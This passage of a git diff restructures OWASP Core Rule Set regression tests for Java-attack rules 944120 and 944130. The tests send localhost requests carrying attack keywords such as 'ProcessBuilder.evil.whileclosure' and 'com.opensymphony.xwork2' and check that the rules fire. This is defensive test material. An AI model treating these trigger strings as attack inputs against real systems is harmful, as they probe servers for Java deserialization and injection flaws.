- Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-134 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-135 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-136 + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 163bba932..39be47806 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -1,8481 +1,8062 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944130.yaml" description: "Positive tests for rule 944130" +rule_id: 944130 tests: - - test_title: 944130-1 + - test_id: 1 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_id: 10 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.opensymphony.xwork2\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.opensymphony.xwork2\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 12 desc: "Argument test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_id: 13 desc: "Argument name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_id: 14 desc: "Cookie test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 15 desc: "Cookie name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.sun.org.apache=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 16 desc: "Request header test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 17 desc: "XML attribute value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 18 desc: "XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_id: 19 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_id: 21 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.sun.org.apache\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.sun.org.apache\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 